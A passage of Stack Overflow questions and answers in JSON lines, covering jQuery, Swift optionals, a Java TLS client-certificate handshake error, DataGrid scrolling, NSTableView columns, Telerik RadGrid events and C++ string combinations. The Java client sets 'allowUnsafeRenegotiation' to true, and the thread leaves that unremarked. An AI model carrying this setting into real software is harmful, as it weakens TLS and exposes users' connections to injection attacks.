<code>$(this).css(\"font-size\");<\/code> returns the size with the unit (e.g. 16px) which is not a number and the calculation results in a <code>NaN<\/code>.\nA quick solution is to parse it to an integer like this:\n<code>var fontSize = parseInt($(this).css(\"font-size\")); \/\/equal to 1em?\n<\/code>\nComment: So I should... parse it somehow? Thank you for your help.\nAnswer: to remove the \"jump\" when first interaction you should set \"top\" and \"left\" on your css, this removes that behavior (tested on your fiddle with 8px or 0.4em equivalent to your initial image size), and for your question about why 5 gets your desired result its that the result of that operation (5 * fontInt) gives you the initial value of images ie. 100px (10em), and that's the amount for top and left that you need to make it zoom from center. (the initial value for fontSize is 20em, initial t =8, so 8-100 = -92, the right value taking in account the margin )\n","meta":{"source":"stackoverflow","title":"jQuery expand element from center not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift 2 Crash optionals\n\nQuestion: I have updated my app to Xcode 7 and converted to swift2 I have cleared all the errors but now when running the app it crashes just after seeing the launch screen. from below code this line is highlighted in green (thread 1 : breakpoint 1.4):\n<code>var cellNumber:Int! = 1\n<\/code>\nI really don't know what is causing an issue. Its my first app please please excuse me for odd ways of coding:\nViewOne.swift\n<code>import Foundation\nimport UIKit\n\n class ViewOne : UITableViewController {\n\n override internal func viewDidLoad() {\n super.viewDidLoad()\n\n }\n\n var cellNumber:Int! = 1\n \/\/var cellNumber = 1\n\n @IBAction func Cell2Pressed(sender: UIButton) {\n cellNumber = 2\n }\n\n @IBAction func Cell3Pressed(sender: UIButton) {\n cellNumber = 3\n }\n\n @IBAction func Cell4Pressed(sender: UIButton) {\n cellNumber = 4\n }\n\n @IBAction func Cell5Pressed(sender: UIButton) {\n cellNumber = 5\n }\n\n @IBAction func Cell6Pressed(sender: UIButton) {\n cellNumber = 6\n }\n\n @IBAction func Cell7Pressed(sender: UIButton) {\n cellNumber = 7\n }\n\n @IBAction func Cell8Pressed(sender: UIButton) {\n cellNumber = 8\n }\n\n @IBAction func Cell9Pressed(sender: UIButton) {\n cellNumber = 9\n }\n\n override internal func didReceiveMemoryWarning() {\n super.didReceiveMemoryWarning()\n }\n\n `\/\/ @IBOutlet weak var Cell1Pressed: UITableViewCell!` \n\n override internal func prepareForSegue(segue: UIStoryboardSegue, sender: AnyObject?) {\n let DestViewControler : ViewController = segue.destinationViewController as! ViewController\n \/\/ var Dest2ViewControler : RadioPlayer = segue.destinationViewController as! RadioPlayer\n\n DestViewControler.trackNumber = cellNumber!\n \/\/ Dest2ViewControler.trackNumber = cellNumber\n\n }\n\n }\n<\/code>\nViewControler.swift\n<code> `import UIKit`\n`import AVFoundation`\n`import MediaPlayer`\n\n`class ViewController: UIViewController {`\n\n override func canBecomeFirstResponder() -> Bool {\n return true\n }\n\n static let sharedInstance = ViewController()\n @IBOutlet var PausePlay: UIButton!\n\n var ButtonAudioPlayer = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"ButtonAudio\", ofType: \"wav\")!))\n\n private var BackgroundAudio1 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio2 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio3 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio4 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio5 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio6 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio7 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio8 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n private var BackgroundAudio9 = try? AVAudioPlayer(contentsOfURL: NSURL(fileURLWithPath: NSBundle.mainBundle().pathForResource(\"Ants\", ofType: \"mp3\")!))\n\n var trackNumber = Int()\n\n override func viewDidLoad() {\n super.viewDidLoad()\n \/\/ Do any additional setup after loading the view, typically from a nib.\n\n play()\n\n \/\/in info.playlist you need to add 'Required background modes and add to idem 0 ap plays audio airplay then below code to play even when iphone is locked: -marcin\n \/*\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n do {\n try AVAudioSession.sharedInstance().setCategory(AVAudioSessionCategoryPlayback)\n } catch _ {\n }\n\n \/\/ Do any additional setup after loading the view, typically from a nib.\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n if NSClassFromString(\"MPNowPlayingInfoCenter\") != nil {\n let image:UIImage = UIImage(named: \"logo_player_background\")!\n let albumArt = MPMediaItemArtwork(image: image)\n let songInfo: NSMutableDictionary = [\n MPMediaItemPropertyTitle: \"WIND\",\n MPMediaItemPropertyArtist: \"DEEP BASE\",\n MPMediaItemPropertyArtwork: albumArt\n ]\n MPNowPlayingInfoCenter.defaultCenter().nowPlayingInfo = songInfo as [NSObject : AnyObject]\n \/\/MPNowPlayingInfoCenter.defaultCenter().nowPlayingInfo = songInfo\n }\n if (AVAudioSession.sharedInstance().setCategory(AVAudioSessionCategoryPlayback)) {\n print(\"Receiving remote control events\")\n UIApplication.sharedApplication().beginReceivingRemoteControlEvents()\n } else {\n print(\"Audio Session error.\")\n }\n\n*\/\n\n}\n override func didReceiveMemoryWarning() {\n super.didReceiveMemoryWarning()\n \/\/ Dispose of any resources that can be recreated.\n }\n\n @IBAction func PlayAudio1(sender: AnyObject) {\n ButtonAudioPlayer!.play()\n\n }\n @IBAction func Stop(sender: AnyObject) {\n\n stop()\n\n \/\/BackgroundAudio1.stop()\n \/\/BackgroundAudio1.currentTime = 0\n\n \/\/PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n }\n\n @IBAction func Restart(sender: AnyObject) {\n\n BackgroundAudio1!.stop()\n BackgroundAudio1!.currentTime = 0\n BackgroundAudio1!.play()\n\n }\n\n @IBAction func PausePlay(sender: AnyObject) {\n\n \/*\n if (BackgroundAudio.playing == true){\n BackgroundAudio.stop()\n PausePlay.setTitle(\"Play\", forState: UIControlState.Normal)\n\n }\n else{\n\n BackgroundAudio.play()\n PausePlay.setTitle(\"Pause\", forState: UIControlState.Normal)\n }\n *\/\n\n toggle()\n\n }\n\n private var isPlaying = false\n\n func play() {\n\n if(trackNumber == 2){\n BackgroundAudio2!.play()}\n if(trackNumber == 3){\n BackgroundAudio3!.play()}\n if(trackNumber == 4){\n BackgroundAudio4!.play()}\n if(trackNumber == 5){\n BackgroundAudio5!.play()}\n if(trackNumber == 6){\n BackgroundAudio6!.play()}\n if(trackNumber == 7){\n BackgroundAudio7!.play()}\n if(trackNumber == 8){\n BackgroundAudio8!.play()}\n if(trackNumber == 9){\n BackgroundAudio9!.play()}\n\n isPlaying = true\n }\n\n func pause() {\n if(trackNumber == 2){\n BackgroundAudio2!.pause()}\n if(trackNumber == 3){\n BackgroundAudio3!.pause()}\n if(trackNumber == 4){\n BackgroundAudio4!.pause()}\n if(trackNumber == 5){\n BackgroundAudio5!.pause()}\n if(trackNumber == 6){\n BackgroundAudio6!.pause()}\n if(trackNumber == 7){\n BackgroundAudio7!.pause()}\n if(trackNumber == 8){\n BackgroundAudio8!.pause()}\n if(trackNumber == 9){\n BackgroundAudio9!.pause()}\n\n isPlaying = false\n }\n\n func pause2() {\n\n BackgroundAudio2!.pause()\n\n BackgroundAudio3!.pause()\n\n BackgroundAudio4!.pause()\n\n BackgroundAudio5!.pause()\n\n BackgroundAudio6!.pause()\n\n BackgroundAudio7!.pause()\n\n BackgroundAudio8!.pause()\n\n BackgroundAudio9!.pause()\n\n isPlaying = false\n }\n\n \/\/dodana przezemnie:\n func stop() {\n if(trackNumber == 2){\n BackgroundAudio2!.stop()}\n if(trackNumber == 3){\n BackgroundAudio3!.stop()}\n if(trackNumber == 4){\n BackgroundAudio4!.stop()}\n if(trackNumber == 5){\n BackgroundAudio5!.stop()}\n if(trackNumber == 6){\n BackgroundAudio6!.stop()}\n if(trackNumber == 7){\n BackgroundAudio7!.stop()}\n if(trackNumber == 8){\n BackgroundAudio8!.stop()}\n if(trackNumber == 9){\n BackgroundAudio9!.stop()}\n\n isPlaying = false\n }\n\n func toggle() {\n if isPlaying == true {\n pause()\n } else {\n play()\n }\n }\n\n func currentlyPlaying() -> Bool {\n return isPlaying\n }\n\n override func remoteControlReceivedWithEvent(event: UIEvent?) {\n if event!.type == UIEventType.RemoteControl {\n if event!.subtype == UIEventSubtype.RemoteControlPlay {\n print(\"received remote play\")\n play() \/\/ these are producing terrible error\n } else if event!.subtype == UIEventSubtype.RemoteControlPause {\n print(\"received remote pause\")\n pause2() \/\/ these are producing terrible error\n } else if event!.subtype == UIEventSubtype.RemoteControlTogglePlayPause {\n print(\"received toggle\")\n ViewController.sharedInstance.toggle()\n }\n }\n }\n\n}\n<\/code>\nComment: possible duplicate of [Error \"Thread 1: breakpoint 2.1\"](http:\/\/stackoverflow.com\/questions\/32038226\/error-thread-1-breakpoint-2-1)\nAnswer: Right off the bat, I think you should say:\n<code>var cellNumber: Int? = 1\n<\/code>\nThe expression <code>Int!<\/code> unwraps an optional variable, but you would use <code>Int?<\/code> to declare an optional variable.\n","meta":{"source":"stackoverflow","title":"Swift 2 Crash optionals","dup_signals":{}},"subset":"stackexchange"} +{"text":"SSL Socket Connection Error\n\nQuestion: I am using JAVA 8. I am trying to connect a Socket Server using client certificates and certificate tree.\nI have followings provided by client:\n\nClient CERT (PEM)\nPrivate Key (PEM)\nCA Tree (PEM) - with 4 Certificates\n\nI have created keystore.jks using following steps:\n\nCombining client cert and CA tree in a single pem file using cat\nCrested PKCS12 file from combined file encrypted using private key(OpenSSL Command)\nGenerated JKS keystore file using keytool\n\nI have created trustore.jks using following steps:\n\nSplit CA Tree (4 certificates) into 4 different files\nGenerated trustore file using keytool by importing each file one by one\n\nMy Sample code is as following :\n<code> package com.tutorial.exception.customize;\n\nimport javax.net.ssl.SSLHandshakeException;\nimport javax.net.ssl.SSLSocket;\nimport javax.net.ssl.SSLSocketFactory;\nimport java.io.*;\nimport java.security.cert.CertPathValidatorException;\nimport java.security.cert.CertificateException;\nimport java.util.Scanner;\n\n\/**\n * Created by SomnathG on 12\/1\/2016.\n *\/\npublic class Client {\n public Client() {\n\n System.setProperty(\"javax.net.ssl.keyStore\", {keystore Location});\n System.setProperty(\"javax.net.ssl.keyStorePassword\", {password});\n System.setProperty(\"javax.net.ssl.trustStore\", {trustore location});\n System.setProperty(\"javax.net.ssl.trustStorePassword\", {password});\n System.setProperty(\"javax.net.debug\", \"all\");\n\n System.setProperty( \"sun.security.ssl.allowUnsafeRenegotiation\", \"true\" );\n }\n\n public void connectHost(){\n SSLSocketFactory sslSocketFactory = (SSLSocketFactory) SSLSocketFactory.getDefault();\n SSLSocket sslSocket = null;\n try {\n\n sslSocket = (SSLSocket) sslSocketFactory.createSocket(host, port);\n sslSocket.setEnabledProtocols(new String[] {\"TLSv1.2\"});\n\n sslSocket.startHandshake();\n\n InputStream inputStream = sslSocket.getInputStream();\n OutputStream outputStream = sslSocket.getOutputStream();\n System.out.println(\"Sending request to Socket Server\");\n outputStream.write(\"Hello\".getBytes());\n outputStream.write(\"exit\".getBytes());\n byte[] messageByte = new byte[1000];\n boolean end = false;\n String dataString = \"\";\n int bytesRead = 0;\n String messageString = \"\";\n DataInputStream in = new DataInputStream(sslSocket.getInputStream());\n\n while(!end)\n {\n bytesRead = in.read(messageByte);\n messageString += new String(messageByte, 0, bytesRead);\n if (messageString.length() == 100)\n {\n end = true;\n }\n }\n System.out.println(\"MESSAGE: \" + messageString);\n \/\/ byte[] read = (byte[]) ois.readObject();\n \/\/String s2 = new String(read);\n \/\/System.out.println(\"\" + s2);\n \/\/System.out.println(\"Message: \" + message);\n \/\/close resources\n\n \/\/System.out.println(receive(inputStream));\n\n }catch (IOException e) {\n e.printStackTrace();\n System.out.println(\"=====\");\n System.out.println(e.getMessage());\n System.out.println(\"=====\");\n CertPathValidatorException ce = new CertPathValidatorException(e);\n System.out.println(\"******\");\n System.out.println(ce.getIndex());\n System.out.println(ce.getReason());\n System.out.println(\"******\");\n \/\/e.printStackTrace();\n }\n\n }\n\n public static void main(String[] args){\n new Client().connectHost();\n }\n}\n<\/code>\nI am getting following exception after executing the code:\n<code> javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path validation failed: java.security.cert.CertPathValidatorException: basic constraints check failed: this is not a CA certificate\nat sun.security.ssl.Alerts.getSSLException(Alerts.java:192)\nat sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1949)\nat sun.security.ssl.Handshaker.fatalSE(Handshaker.java:302)\nat sun.security.ssl.Handshaker.fatalSE(Handshaker.java:296)\nat sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1509)\nat sun.security.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:216)\nat sun.security.ssl.Handshaker.processLoop(Handshaker.java:979)\nat sun.security.ssl.Handshaker.process_record(Handshaker.java:914)\nat sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1062)\nat sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1375)\nat sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1403)\nat sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1387)\nat com.tutorial.exception.customize.Client.connectHost(Client.java:33)\nat com.tutorial.exception.customize.Client.main(Client.java:82)\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\nat java.lang.reflect.Method.invoke(Method.java:498)\nat com.intellij.rt.execution.application.AppMain.main(AppMain.java:147)\n<\/code>\nAfter analyzing the log I have found \"clientHello\" and \"serverHello\" messages but after that application is throwing above mentioned exception.\nWhat am I doing wrong? Please advice.\nThanks,\nSomnath Guha\nComment: `CertPathValidatorException: basic constraints check failed: this is not a CA certificate` sounds like you have the CA certs in the wrong place or swapped with some other certificate.\nComment: I am creating truststore jks using CA Certs. Do I need to add client cert also in trustore file?\nAnswer: I have figured out the issue after analyzing the debug lo.\n\"BasicConstraints\" was missing from the server V3 certificates and thus java was failing to recognize the certificate as a valid certificate. Once that constraint has been added then the client was able to handshake with the server and able to communicate with server.\nBasicConstraints:[\n CA:true\n PathLen:2147483647\n]\n","meta":{"source":"stackoverflow","title":"SSL Socket Connection Error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Move vertical scrollbar up anytime datagrid is refreshed\n\nQuestion: Hello Everybody I am new in C#. I have a some data that in load in my datagrid but anytime the datagrid has new items loaded my vertical scroll bar stays in the same position!\nHow to move up my scroll bar anytime the datagrid has new values or I click to a new button\nmove vertical scrollabar up anytime the datagrid is refresh\nComment: Welcome to SO. First lesson: C# is not C.\nComment: Okay so any idea about my question? please @Gerhardh\nComment: No, but if you add wrong language tag, the wrong people will look into your question who might not know much about C# (like me)\nAnswer: The DataGrid class has a method <code>ScrollIntoView<\/code> which can be used to scroll a specific item into the visible area of the datagrid.\nFor example, to scroll to the first item of the datagrid:\n<code>datagrid.ScrollIntoView(datagrid.Items[0]);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Move vertical scrollbar up anytime datagrid is refreshed","dup_signals":{}},"subset":"stackexchange"} +{"text":"Columns added programmatically to NSTableView not recognised in Delegate\n\nQuestion: I may be lost in a glass of water but I can't seem to be able to add columns to a NSTableView that are then recognised in the NSTableViewDelegate. I create a table in IB with one column and give the column a string identifier. The I add the other columns in the View Controller:\n<code> override func viewDidLoad() {\n super.viewDidLoad()\n\n for columnIndex in 0..<blotter!.singleOutput[0].parameter.count {\n\n let tmpParam = blotter!.singleOutput[0].parameter[columnIndex]\n let column = NSTableColumn(identifier: NSUserInterfaceItemIdentifier(rawValue: tmpParam.columnID))\n column.title = tmpParam.label\n column.width = CGFloat(80)\n column.minWidth = CGFloat(40)\n column.maxWidth = CGFloat(120)\n blotterOutputTable.addTableColumn(column)\n\n }\n\n blotterOutputTable.delegate = self\n blotterOutputTable.dataSource = self\n blotterOutputTable.target = self\n\n blotterOutputTable.reloadData()\n\n }\n<\/code>\nThe NSTableViewDataSource returns the correct number of rows. The problem I have is in the NSTableViewDelegate:\n<code>extension OutputsViewController: NSTableViewDelegate {\n\n func tableView(_ tableView: NSTableView, viewFor tableColumn: NSTableColumn?, row: Int) -> NSView? {\n\n var text: String = \"\"\n var cellIdentifier: String = \"\"\n\n guard let item = blotter?.singleOutput[row] else { return nil }\n\n \/\/ 1. LABELS COLUMN\n \/\/ ================\n\n if tableColumn?.identifier.rawValue == \"dealColumn\" {\n\n let myParameter = item.parameter.index(where: {$0.columnID == \"BBTickColumn\"})\n\n text = item.parameter[myParameter!].value as! String \n cellIdentifier = \"dealColumn\"\n\n if let cell = tableView.makeView(withIdentifier: NSUserInterfaceItemIdentifier(rawValue: cellIdentifier), owner: nil) as? NSTableCellView {\n\n cell.textField?.stringValue = text \n return cell\n }\n\n else { return nil }\n\n } \/\/ END OF LABLES COLUMN (FIRST ONE)\n\n else { \/\/ THIS IS WHERE THE PROBLEM IS\n\n let myParameter = item.parameter.index(where: {$0.columnID == tableColumn?.identifier.rawValue } )\n let (_, valueAsText) = item.parameter[myParameter!].interfaceItems()\n text = valueAsText\n\n cellIdentifier = item.parameter[myParameter!].columnID\n\n if let cell = tableView.makeView(withIdentifier: NSUserInterfaceItemIdentifier(rawValue: cellIdentifier), owner: nil) as? NSTableCellView {\n\n cell.textField?.stringValue = text\n return cell\n }\n\n else { return nil } \/\/ DEBUGGER PARAMETER ARE FROM HERE\n\n } \n }\n\n}\n<\/code>\nThe first column is the one I created in IB with its identifier. That works. The problem I have is in the else statement (which does not check for a column identifier). Below are the parameters as I see them in the debugger window when I stop the program after the cell creation failed \n<code>tableView NSTableView 0x000000010ebf9df0\ntableColumn NSTableColumn? 0x0000600000895770\nrow Int 0\nself DataBaseManager.OutputsViewController 0x0000600000102b50\ntext String \"FLAT\" \ncellIdentifier String \"directionColumn\" \nitem DataBaseManager.BlotterOutputs 0x000060000002c240\nmyParameter Array.Index? 0\nvalueAsText String \"FLAT\" \ncell (null) (null) (null)\ntableColumn NSTableColumn? 0x0000600000895770\ntableColumn?.identifier NSUserInterfaceItemIdentifier? some\n_rawValue _NSContiguousString \"directionColumn\" 0x000060000104d200\nSwift._SwiftNativeNSString _SwiftNativeNSString \n_core _StringCore \n<\/code>\nYou can see that cellIdentifier and the tableColumn?.identifier.rawvalue are the same string (as it should be). I cannot understand then why the cell is not created. Any help is mostly welcome and let me know if this is not clear. Thanks\nComment: Does the tableview in the Storyboard\/XIB contain a cell view with id \"directionColumn\"?\nComment: Than you for your reply Willeke. The answer is no. Only the first column is in IB (\"dealColumn\"). All the other columns are added in viewDidLoad(). Their identifiers are in a class (parameter) which has a columnID property. It is the one that is used as the identifier for the newly created column. The debugger shows directionColumn because that is the first column that is created (and therefore where I stop the program to debug). I have about 50 columns to create, hence why I do not want to put them all in IB but add them programmatically.\nComment: Possible duplicate of [How to add columns in Cocoa NSTableView?](https:\/\/stackoverflow.com\/questions\/35585562\/how-to-add-columns-in-cocoa-nstableview)\nComment: I have looked at it and can't seem to make it working. Specifically I have modified viewDidLoad() to include the nib lines:\nComment: But on the line let myCellViewNib = blotterOutputTable.registeredNibsByIdentifier![\"dealColumn\"] get an error message: Cannot subscript a value of type '[NSUserInterfaceItemIdentifier : NSNib]' with an index of type 'String'. Apologies if this is trivial, but I am not a professional developer and I don't have a lot of experienced. Thank you\nComment: I looked into it and adjusted the syntax and now everything works. Thank you again\nAnswer: must register nibs identifiers as in this code:\n<code>import Cocoa\n\nclass MultiColumnTable: NSViewController, NSTableViewDataSource, NSTableViewDelegate {\n\n var list = [[String]](), header=[String]()\n var tableView : NSTableView? = nil\n var nColumns : Int = 0\n\n func genID(col : Int) -> NSUserInterfaceItemIdentifier { \/\/ generate column ID\n return NSUserInterfaceItemIdentifier(rawValue: String(format: \"Col%d\", col))\n }\n\n func setContent(header: [String], list : [[String]]) {\n self.header = header\n self.list = list\n self.nColumns = list[0].count\n\n if tableView != nil {\n tableView?.reloadData()\n }\n }\n\n func numberOfRows(in tableView: NSTableView) -> Int {\n\n func createColumns() {\n func addColumn(col:Int, header:String) {\n let tableColumn = NSTableColumn(identifier: genID(col: col))\n tableColumn.headerCell.title = header\n self.tableView!.addTableColumn(tableColumn)\n }\n\n \/\/ create columns and register them in NIB\n \/\/ IB: tableColumn[0] identifier ( NSTableColumn to \"Col0\" )\n\n if let myCellViewNib = tableView.registeredNibsByIdentifier![NSUserInterfaceItemIdentifier(rawValue: \"Col0\")] {\n\n for col in 0..<nColumns { \/\/ table should have 1 col in IB w\/Ident 'Col0'\n addColumn(col: col, header: header[col])\n tableView.register(myCellViewNib, forIdentifier: genID(col: col)) \/\/ register the above Nib for the newly added tableColumn\n }\n tableView.removeTableColumn(tableView.tableColumns[0]) \/\/ remove the original Col0\n }\n }\n\n self.tableView = tableView\n createColumns()\n\n return list.count\n }\n\n func tableView(_ tableView: NSTableView, viewFor tableColumn: NSTableColumn?, row: Int) -> NSView? {\n\n let column = tableView.tableColumns.firstIndex(of: tableColumn!)!\n tableColumn?.headerCell.title=header[column];\n\n if let cell = tableView.makeView(withIdentifier: (tableColumn?.identifier)!, owner: self) as? NSTableCellView {\n\n cell.textField?.stringValue = list[row][column]\n cell.textField?.textColor = NSColor.blue\n return cell\n }\n return nil\n }\n\n func tableViewSelectionDidChange(_ notification: Notification) {\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Columns added programmatically to NSTableView not recognised in Delegate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there any OnClick event of Telerik RadGrid Command Item?\n\nQuestion: When I add <code>CommandItemDisplay=\"Top\"<\/code> in my Telrik RadGrid <code>MasterTableView<\/code>, I get 1 button <code>AddNewRecordButton<\/code> and 1 LinkButton <code>InitInsertButton<\/code>.\nNow, I would like to do some code on their <code>onclick<\/code> event i.e., Button\/LinkButton enable and disable based on some condition.\nAll I need to do is:\nThere is a RadComboBox (outside of RadGrid) in my Web page and a RadGrid.\nWhen first time page loads, and user forgets to Select Item from RadComboBox\nand clicks on \"Add New\" button of RadGrid\nthen this button should disable at that time and an alert should come (Select item from ComboBox first)\nNow, when user select the item from RadComboBox, \nand then click on \"Add New\" button of RadGrid\nthen it should perform \"add\" functionality \/\/---this part is done\nBelow code (replied by Roman) is working fine to disable the \"Add New\" button and show alert.\nBut how to create this requirement using this code? Where to put this line of code so that it should work as per need. Please guide.\nPlease note that I am very new in Telerik controls so if I ask something very basic please forgive and try to guide me in a simple way.\nThanks in advance.\nAnswer: Use <code>RadGrid_ItemCreated()<\/code> event and <code>Attributes.Add()<\/code> method:\n<code>protected void RadGrid1_ItemCreated(object sender, GridItemEventArgs e)\n{\n if (e.Item is GridCommandItem)\n {\n Button btn = (Button)e.Item.FindControl(\"AddNewRecordButton\");\n btn.Attributes.Add(\"onClick\", \"test()\");\n\n LinkButton linkBtn = (LinkButton)e.Item.FindControl(\"InitInsertButton\");\n linkBtn.Attributes.Add(\"onClick\", \"test()\");\n }\n}\n<\/code>\nAnd then add your function to your HTML:\n<code><script type=\"text\/javascript\">\n function test() {\n alert(\"test message\");\n }\n<\/script>\n<\/code>\nComment: Thank you for the reply. when I place the code in `Page_Load()` event, I get this error : **System.IndexOutOfRangeException: Index was outside the bounds of the array**. At Line: **GridCommandItem cmditem = (GridCommandItem)RGGSTAcCode.MasterTableView.GetItems(GridItemType.CommandItem)[0];** . Please reply how to solve it? This is the starting line of my code: `protected void Page_Load(object sender, EventArgs e)\n {\n if (ddlCompany.SelectedItem == null)\n {\n GridCommandItem cmditem = (GridCommandItem)RGGSTAcCode.MasterTableView.GetItems(GridItemType.CommandItem)[0];`\nComment: Thank you so much for the reply. Please check my posted question (from \"All I need to do\") I made an edit in it and explained what I really want to do. Your code is working but I am unable to implement my requirement using your code. Please guide me.\nComment: The only problem you've got is to alert a message when nothing is selected?\nComment: Thankyou for the reply. Yaah can say that. Also, please let me know that if I have to disable the \"Add New\" button , when nothing is selected (including \"first time page load\" or multiple number of times) then where shall I put your code ? I mean inside which event ? And If item is selected then where shall I put the \"else\" condition ?? SO that all should work as per expected.\nComment: Okay, seems `Page_Load()` event is executed too early. Create `RadGrid_DataBound()` event and paste the code to disable the buttons in this event. Then the buttons will be disabled directly after the RadGrid has been databounded. And remove the code from `Page_Load()` event.\nComment: Ok when I put my code under `RadGrid_DataBound()` event, then its working fine on first time page load. But When I place my code under `RadComboBox_SelectedIndexChanged()` event as: `protected void ddlCompany_SelectedIndexChanged(object sender, RadComboBoxSelectedIndexChangedEventArgs e)\n {\n if (ddlCompany.SelectedItem != null)\n {\n foreach (GridDataItem item in RGGSTAcCode.EditItems)\n {\n \/\/Dropdown Bind logic\n }\n }\n else\n {\n \/\/Add New button disable logic\n }\n }`\nComment: Then its not going inside `foreach (GridDataItem item in RGGSTAcCode.EditItems)` statement. Due to this every time it goes inside \"else condition\" and my \"Add New\" button always remain disabled (no matter I am selecting items from RadComBox or not). Please suggest some solution. what is wrong in my code ?\nComment: Let us [continue this discussion in chat](http:\/\/chat.stackoverflow.com\/rooms\/82903\/discussion-between-roman-and-user3196511).\nComment: @user3196511, see my latest chat message\nComment: Thank you for your reply. But I had solved the issue. I tried the same code suggested by you in your answer but on `RGGSTAcCode_ItemCommand` event. And its working fine as per my requirement. Thank you so much for the help. Please check the updated solution.\n","meta":{"source":"stackoverflow","title":"Is there any OnClick event of Telerik RadGrid Command Item?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to generate the string sequence in C++\n\nQuestion: I am trying to do the following on my computer but not getting it to perform, like say I have a name of a person and I want to make a different combinations of the letters in his name:\n<code>NAME ABC\n ABC\n \/ | \\\n A B C\n \/|\\ \/ | \\ \/| \\\n AA AB AC BA BB BC CA CB CC \n . . .\n . . .\n<\/code>\nI want to make combinations of the above name, for example:\n<code>ABC A B C AA AB AC BA BB BC CA CB CC.... AAA... BBB... CCC...\n<\/code>\nHow can I do this in C++?\nI wrote the following code for it:\n<code> string c = \"ABC\";\n for (i = 0; i < c.length(); i++)\n c.at(i);\n<\/code>\nBut it only generated <code>A, B, C<\/code>. How do I generate <code>AB, AA, AC, ...<\/code>?\nComment: Consider writing an _algorithm_ in pseudo-code to get a clear understanding _how_ you plan to solve it first. Then you can translate it into C.\nComment: What about `CBA, BAC, etc.`? Or did you just want two-letter combinations? The good news is the code you have is the building block for the rest of the algorithm. You definitely need to write some pseudocode or even draw on paper what you think should happen.\nComment: I don't get it if you are allowing repetition of characters then the number of possible words is infinite.\nComment: check it now its i think clear\nComment: Try a simple permutation algorithm\nAnswer: you can do this\n<code>string c='ABC';\nint n=c.length();\n\nfor(int i=0;i<n;i++)\n{\n std::cout<<c[i]<<\" \";\n\n for(int j=0 ; j< n ;j++)\n {\n std::cout<<c[i]<<c[j]<<\" \";\n }\n}\n<\/code>\nThe output is:\n<code>A AA AB AC B BA BB BC C CA CB CC<\/code>\nIf you want the three letter combinations, add a third for loop inside the second for loop with the same end points like\n<code>for(int k=0;k<n;k++)<\/code> and inside the for loop <code>cout<<c[i]<<c[j]<<c[k]<<\" \"<\/code>\nComment: you are right but i want it general like if i go for 3 combinations or 4 combinations i.e AAA,AAB, AAC or AAAA AAAB AAAC and so on store it in a string\nAnswer: Here's a solution involving lovely recursive templates:\n<code>#include <iostream>\n#include <string>\n\ntemplate <int Depth>\nvoid print_combinations(const std::string& name, const std::string& prefix = \"\")\n{\n for (int i=0; i < name.size(); i++) {\n std::cout << prefix << name[i] << \" \";\n print_combinations<Depth - 1>(name, prefix + name[i]);\n }\n}\n\ntemplate <>\nvoid print_combinations<0>(const std::string&, const std::string&)\n{\n}\n\nint main()\n{\n std::string name = \"ABC\";\n\n print_combinations<4>(name);\n}\n<\/code>\nFor <code>Depth=4<\/code> (as above), it prints\n\nA AA AAA AAAA AAAB AAAC AAB AABA AABB AABC AAC AACA AACB AACC AB ABA ABAA ABAB ABAC ABB ABBA ABBB ABBC ABC ABCA ABCB ABCC AC ACA ACAA ACAB ACAC ACB ACBA ACBB ACBC ACC ACCA ACCB ACCC B BA BAA BAAA BAAB BAAC BAB BABA BABB BABC BAC BACA BACB BACC BB BBA BBAA BBAB BBAC BBB BBBA BBBB BBBC BBC BBCA BBCB BBCC BC BCA BCAA BCAB BCAC BCB BCBA BCBB BCBC BCC BCCA BCCB BCCC C CA CAA CAAA CAAB CAAC CAB CABA CABB CABC CAC CACA CACB CACC CB CBA CBAA CBAB CBAC CBB CBBA CBBB CBBC CBC CBCA CBCB CBCC CC CCA CCAA CCAB CCAC CCB CCBA CCBB CCBC CCC CCCA CCCB CCCC\n","meta":{"source":"stackoverflow","title":"how to generate the string sequence in C++","dup_signals":{}},"subset":"stackexchange"} +{"text":"NHibernate EventListeners - getting the value of a property of the entity being saved\n\nQuestion: I'm implementing a custom EventListener to save auditing information in 